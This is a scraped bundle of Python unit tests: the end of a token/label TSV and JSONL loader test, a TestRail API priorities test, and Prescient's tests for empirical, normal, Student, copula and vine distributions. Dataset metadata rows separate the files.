assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Côte
d’Ivoire].
Bulletin
de
la
Société
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
Text of TEST_TSV_TRAIN:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Côte i-r a
d’Ivoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Société i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
def test_yield_toke_label_pairs():
tokens = [
[],
["the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."],
["Bulletin", "de", "la", "Société", "de", "Pathologie"],
["Exotique", "et"],
]
labels = [
[],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r"],
]
expected = [
(None, None),
("the", "i-r"),
("focus", "i-r"),
("in", "i-r"),
("Daloa", "i-r"),
(",", "i-r"),
("Côte", "i-r"),
("d’Ivoire].", "i-r"),
(None, None),
("Bulletin", "i-r"),
("de", "i-r"),
("la", "i-r"),
("Société", "i-r"),
("de", "i-r"),
("Pathologie", "i-r"),
(None, None),
("Exotique", "i-r"),
("et", "i-r"),
(None, None),
]
actual = list(yield_token_label_pairs(tokens, labels))
assert expected == actual
def test_read_jsonl():
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
actual = read_jsonl(TEST_JSONL)
assert expected == actual
def test_write_jsonl(tmpdir):
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
temp_file = os.path.join(tmpdir, "file.jsonl")
write_jsonl(expected, temp_file)
actual = read_jsonl(temp_file)
assert expected == actual
def test_split_list_by_linebreaks():
lst = ["a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
def test_list_by_linebreaks_ending_in_None():
lst = ["a", "b", "c", float("nan"), "d", None]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
def test_list_by_linebreaks_starting_in_None():
lst = [None, "a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
actual = _split_list_by_linebreaks(lst)
| 24.259475
| 88
| 0.414373
| 1,020
| 8,321
| 3.254902
| 0.107843
| 0.063253
| 0.05241
| 0.06988
| 0.629819
| 0.558434
| 0.509036
| 0.483735
| 0.471386
| 0.471386
| 0
| 0.026336
| 0.361134
| 8,321
| 342
| 89
| 24.330409
| 0.598194
| 0.118736
| 0
| 0.502439
| 0
| 0
| 0.19671
| 0
| 0
| 0
| 0
| 0
| 0.068293
| 1
| 0.058537
| false
| 0
| 0.02439
| 0.004878
| 0.087805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa141b264762a22f9a2b6309a86900f4d79fb07
| 389
|
py
|
Python
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 21
|
2019-04-15T07:25:48.000Z
|
2022-03-19T04:21:43.000Z
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 30
|
2019-04-15T07:18:59.000Z
|
2022-03-19T07:26:57.000Z
|
tests/unit/test_priorities.py
|
anshumangoyal/testrail-api
|
a9b2983a59667999a8432fa0af034c1fbd07e1cc
|
[
"MIT"
] | 16
|
2019-02-21T11:59:32.000Z
|
2022-02-23T17:33:16.000Z
|
import json
import responses
def test_get_priorities(api, mock, host):
mock.add_callback(
responses.GET,
'{}index.php?/api/v2/get_priorities'.format(host),
lambda x: (200, {}, json.dumps([{'id': 1, 'priority': 1}, {'id': 4, 'priority': 4}]))
)
resp = api.priorities.get_priorities()
assert resp[0]['id'] == 1
assert resp[1]['priority'] == 4
| 24.3125
| 93
| 0.59383
| 52
| 389
| 4.346154
| 0.519231
| 0.172566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0.213368
| 389
| 15
| 94
| 25.933333
| 0.699346
| 0
| 0
| 0
| 0
| 0
| 0.164524
| 0.087404
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa14c2eb69ff76b5ae4ab590ca445b49132d179
| 37,185
|
py
|
Python
|
prescient/gosm/tester.py
|
iSoron/Prescient
|
a3c1d7c5840893ff43dca48c40dc90f083292d26
|
[
"BSD-3-Clause"
] | 21
|
2020-06-03T13:54:22.000Z
|
2022-02-27T18:20:35.000Z
|
prescient/gosm/tester.py
|
iSoron/Prescient
|
a3c1d7c5840893ff43dca48c40dc90f083292d26
|
[
"BSD-3-Clause"
] | 79
|
2020-07-30T17:29:04.000Z
|
2022-03-09T00:06:39.000Z
|
prescient/gosm/tester.py
|
bknueven/Prescient
|
6289c06a5ea06c137cf1321603a15e0c96ddfb85
|
[
"BSD-3-Clause"
] | 16
|
2020-07-14T17:05:56.000Z
|
2022-02-17T17:51:13.000Z
|
# ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
class EmpiricalDistributionTester(unittest.TestCase):
def setUp(self):
points = [1, 1, 2, 2, 3, 5, 6, 8, 9]
self.distribution = UnivariateEmpiricalDistribution(points)
def test_at_point(self):
self.assertAlmostEqual(self.distribution.cdf(1), 2 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(2 / 10), 1)
def test_before_first(self):
self.assertAlmostEqual(self.distribution.cdf(0.5), 1 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(1 / 10), 0.5)
def test_far_before_first(self):
self.assertEqual(self.distribution.cdf(-4), 0)
def test_between_points(self):
self.assertAlmostEqual(self.distribution.cdf(4), 11 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(11 / 20), 4)
def test_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(9.5), 19 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(19 / 20), 9.5)
def test_far_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(20), 1)
class EpisplineTester(unittest.TestCase):
def setUp(self):
input_data = np.random.randn(1000)
self.distribution = UnivariateEpiSplineDistribution(input_data)
def test_cdf_values(self):
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha - 100), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta), 1)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta + 100), 1)
def test_region_probability(self):
# Tests the region probability by asserting the disjoint union of all regions must add up to 1
midpoint = (self.distribution.alpha + self.distribution.beta) / 2
integral_value = (self.distribution.region_probability((self.distribution.alpha, midpoint))
+ self.distribution.region_probability((midpoint, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
one_third_way = (2*self.distribution.alpha + self.distribution.beta) / 3
two_thirds_way = (self.distribution.alpha + 2*self.distribution.beta) / 3
integral_value = (self.distribution.region_probability((self.distribution.alpha, one_third_way))
+ self.distribution.region_probability((one_third_way, two_thirds_way))
+ self.distribution.region_probability((two_thirds_way, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
def test_quick(self):
print('Warning : this code must be called with runner.py')
# Copy this code at the beginning of copula_test to see if it works
# And enter python3 runner.py copula_experiments/run_test.txt
gosm_options.set_globals()
# Create output directory.
if not (os.path.isdir(gosm_options.output_directory)):
os.mkdir(gosm_options.output_directory)
X = np.arange(300)
tic()
mydistr = UnivariateEpiSplineDistribution(X)
for i in range(10):
print(mydistr.cdf(i))
toc()
class UnivariateNormalDistributionTester(unittest.TestCase):
def test_quick(self):
data = np.random.randn(1000)
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.rect_prob(-1.96,1.96),0.95,1)
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
mydistr = UnivariateNormalDistribution(input_data=x)
res, i = spi.quad(mydistr.pdf, -1, 3)
self.assertAlmostEqual(res,mydistr.rect_prob(-1, 3),5)
def test_with_mean_var(self):
sigma = 2
mean = 3
data = sigma*np.random.randn(10000)+mean
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.cdf(4),0.6915,1)
dist = UnivariateNormalDistribution(mean = mean,var=sigma**2)
self.assertAlmostEqual(dist.cdf(4),0.6915,3)
class MultiNormalDistributionTester(unittest.TestCase):
def test_two_dimensions(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [-4, 3]
ourcov = [[2, 0], [0, 2]]
lowerdict = {"solar": -1, "wind": 0}
upperdict = {"solar": 3, "wind": 4}
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
dist = MultiNormalDistribution(dimkeys,input_data=data_dict)
dist2 = MultiNormalDistribution(dimkeys,mean=ourmean,cov=ourcov)
self.assertAlmostEqual(dist.rect_prob(lowerdict,upperdict),dist2.rect_prob(lowerdict,upperdict),2)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:,1]),ourmean[1],1)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:, 0]), ourmean[0], 1)
def test_with_gaussian_copula_1_dim(self):
mymean = 0
myvar = 2
dimkeys1 = ["solar"]
lowerdict = {"solar": -2}
upperdict = {"solar": 1}
data_array1 = np.random.multivariate_normal([mymean], [[myvar]], 10000)
data_dict1 = {"solar": data_array1[:, 0]}
marginals1 = {"solar": UnivariateNormalDistribution(input_data=data_array1[:, 0])}
unigaussian1 = GaussianCopula(input_data=data_dict1, dimkeys=dimkeys1, marginals=marginals1)
unigaussian2 = MultiNormalDistribution(dimkeys1, input_data=data_dict1)
self.assertAlmostEqual(unigaussian1.rect_prob(lowerdict, upperdict),unigaussian2.rect_prob(lowerdict, upperdict),3)
def test_with_gaussian_copula_2_dim(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [3, 4]
ourmeandict = {"solar": 0, "wind": 0}
ourcov = [[1, 0.5], [0.5, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
valuedict = {"solar": 0, "wind": 0}
lowerdict = {"solar": 2, "wind": 3}
upperdict = {"solar": 4, "wind": 5}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
valuedict = {"solar": 0.45, "wind": 0.89}
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 3)
def test_with_gaussian_copula_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1}
upperdict = {"solar": 1, "wind": 1, "tide": 1}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
GaussianCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.1)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 2)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),multigaussian2.rect_prob(lowerdict, upperdict), 1)
class UnivariateStudentDistributionTester(unittest.TestCase):
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
student = UnivariateStudentDistribution(input_data=x)
res, i = spi.quad(student.pdf, -1, 3)
self.assertAlmostEqual(res,student.rect_prob(-1, 3),5)
def test_in_student_copula_cdf(self):
dimkeys = ["solar", "wind"]
x = np.random.randn(2000)
dictin = {"solar": x, "wind": x + np.random.randn(2000)}
student = StudentCopula(dimkeys, dictin)
self.assertAlmostEqual(student._t(student._inverse_t(0.1)),0.1,7)
self.assertAlmostEqual(student._inverse_t(student._t(-6)),-6,7)
class MultiStudentDistributionTester(unittest.TestCase):
def test_generates_X(self):
x = np.random.randn(200)
dictin = {"solar": x, "wind": x + 0.5 * np.random.randn(200)}
dimkeys = ["solar", "wind"]
mydistr = MultiStudentDistribution(dictin)
print(mydistr.generates_X(10))
def initialize(dim=2,precision = None,copula_string='independence-copula'):
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
# For some tests, gaussian and student are less precised so we change so precision asked :
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
class CopulaTester(unittest.TestCase):
def test_quick(self,copula_string='independence-copula'):
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.05, "wind": 0.12}
valuedict = {"solar": 1, "wind": 0.34}
self.assertAlmostEqual(mydistr.C(valuedict),0.34,3)
valuedict = {"solar": 0.47, "wind": 1}
self.assertAlmostEqual(mydistr.C(valuedict), 0.47,3)
def test_C_with_sample(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string, dim=2)
valuedict = {"solar": 0.05, "wind": 0.12}
self.assertAlmostEqual(mydistr.C(valuedict),mydistr.C_from_sample(valuedict),2)
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('3d not implemented for archimedian copulas')
else:
mydistr = initialize(copula_string=copula_string, dim=3)
valuedict = {"solar": 0.12, "wind": 0.23, "tide": 0.31}
self.assertAlmostEqual(mydistr.C_from_sample(valuedict, 1000), mydistr.C(valuedict), 1)
def test_partial_derivative_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.67, "wind": 0.82}
mydistr= initialize(copula_string=copula_string)
if copula_string=='student-copula':
precision = 2
elif copula_string=='gaussian-copula':
precision = 4
else:
precision = 7
def g(x):
return mydistr.C_partial_derivative(u=valuedict.get("solar"),v=x)
res,i= spi.quad(g,0,valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
valuedict = {"solar": 0.14, "wind": 0.42}
res, i = spi.quad(g, 0, valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
def test_inverse_partial_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative f inverse is correct by computing
f(inverse_f(x)) and inverse_f(f(x)) and checking if they are both equal to x.
"""
valuedict = {"solar": 0.84, "wind": 0.17}
mydistr = initialize(copula_string=copula_string)
u = valuedict.get("solar")
v = valuedict.get("wind")
direct = mydistr.C_partial_derivative(valuedict=valuedict)
inverse = mydistr.inverse_C_partial_derivative(valuedict=valuedict)
self.assertAlmostEqual(u,mydistr.C_partial_derivative(u=inverse,v=v),8)
self.assertAlmostEqual(u,mydistr.inverse_C_partial_derivative(u=direct,v=v),8)
def test_c_with_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.34, "wind": 0.73}
mydistr = initialize(copula_string=copula_string)
def g(x,y):
return mydistr.c(u=x,v=y)
def low_bound(x):
return 0
def up_bound(x):
return valuedict.get("wind")
res,i= spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict),res,4)
valuedict = {"solar": 0.12, "wind": 0.21}
res, i = spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict), res,4)
def test_c_with_partial_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.14, "wind": 0.49}
def g(x):
return mydistr.c(u=x,v=valuedict.get("wind"))
if copula_string=='student-copula':
precision = 2
else:
precision = 6
res,i= spi.quad(g,0,valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict),res,precision)
valuedict = {"solar": 0.56, "wind": 0.37}
res, i = spi.quad(g, 0, valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict), res,precision)
def test_plot(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string,dim=dim)
n = 30 #number of points you want to display
U = mydistr.generates_U(n=n)
diag2 = diag(2)
for k in range(2): # index of the diagonal where you want to project we do both
plt.plot(U[:, 0], U[:, 1], 'go')
plt.plot([diag2.list_of_diag[k][0][1], diag2.list_of_diag[k][1][1]], 'b')
P = diag2.proj_vector(U,k)
plt.plot(P[:, 0], P[:, 1], 'ro')
plt.plot([U[:, 0], P[:, 0]], [U[:, 1], P[:, 1]], c='k')
plt.show()
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('Plot 3d not implemented for archimedian copulas')
else:
mydistr = initialize(dim=3,copula_string=copula_string)
n = 20 # number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P = []
fig = plt.figure()
center = 0.5 * np.ones(d)
k = 2 # index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj_vector(U[i], k)
ax.scatter(P[0, 0], P[0, 1], P[0, 2], c='r', marker='o')
ax.plot([U[i, 0], P[0, 0]], [U[i, 1], P[0, 1]], [U[i, 2], P[0, 2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0], diagonal[1][0]], [diagonal[0][1], diagonal[1][1]],
[diagonal[0][2], diagonal[1][2]],
c='b')
ax.set_xlabel(mydistr.dimkeys[0])
ax.set_ylabel(mydistr.dimkeys[1])
ax.set_zlabel(mydistr.dimkeys[2])
plt.show()
class LogLikelihoodTester(unittest.TestCase):
def test_gaussian_copula2d(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho = 0.5
rho2 = 0.7
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
gumbel = GumbelCopula(dimkeys, data_dict, marginals)
frank = FrankCopula(dimkeys, data_dict, marginals)
clayton = ClaytonCopula(dimkeys, data_dict, marginals)
student = StudentCopula(dimkeys, data_dict, marginals)
multigaussian1 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian3 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian4 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov)
l1=multigaussian1.c_log_likelihood()
self.assertGreater(l1,multigaussian2.c_log_likelihood())
self.assertGreater(multigaussian3.c_log_likelihood(),multigaussian4.c_log_likelihood())
self.assertGreater(l1,gumbel.c_log_likelihood())
self.assertGreater(l1, clayton.c_log_likelihood())
self.assertGreater(l1, frank.c_log_likelihood())
self.assertGreater(l1, student.c_log_likelihood())
def test_weighted_combined_copula3d(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
copulas= ['student-copula', 'gaussian-copula']
list_of_gaussian = ['gaussian-copula','gaussian-copula']
list_of_student = ['student-copula','student-copula']
weights =[0.12,0.88]
mydistr = WeightedCombinedCopula(dimkeys,data_dict,marginals,copulas,weights)
gaussian = GaussianCopula(dimkeys,data_dict,marginals)
weightedgaussian = WeightedCombinedCopula(dimkeys,data_dict,marginals,list_of_gaussian,weights)
weightedstudent = WeightedCombinedCopula(dimkeys, data_dict, marginals, list_of_student, weights)
student = StudentCopula(dimkeys,data_dict,marginals)
g = gaussian.c_log_likelihood()
s = student.c_log_likelihood()
m = mydistr.c_log_likelihood()
self.assertAlmostEqual(weightedgaussian.c_log_likelihood(),g,7)
self.assertAlmostEqual(weightedstudent.c_log_likelihood(),s,7)
self.assertGreater(g,m)
self.assertGreater(m,s)
class VineCopulaTester(unittest.TestCase):
def test_quick_dim_2(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [1, 0.5]
ourcov = [[1, 0.3], [0.3, 2]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula'],
[None, None]]
valuedict = {"solar": 0.96, "wind": 0.87}
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
gaussiancopula = GaussianCopula(dimkeys,data_dict,marginals)
gaussiancopula.c(valuedict)
self.assertAlmostEqual(CVine.C(valuedict),DVine.C(valuedict),1)
self.assertAlmostEqual(gaussiancopula.C(valuedict), DVine.C(valuedict), 1)
self.assertAlmostEqual(CVine.C(valuedict), gaussiancopula.C(valuedict), 1)
def test_quick_dim_3(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula', 'frank-copula'],
[None, None, 'clayton-copula'],
[None, None, None]]
valuedict = {"solar": 0.43, "wind": 0.92, "tide": 0.27}
print('CVine')
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(CVine.C(valuedict=valuedict))
print(CVine.c(valuedict))
print('DVine')
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(DVine.C(valuedict=valuedict))
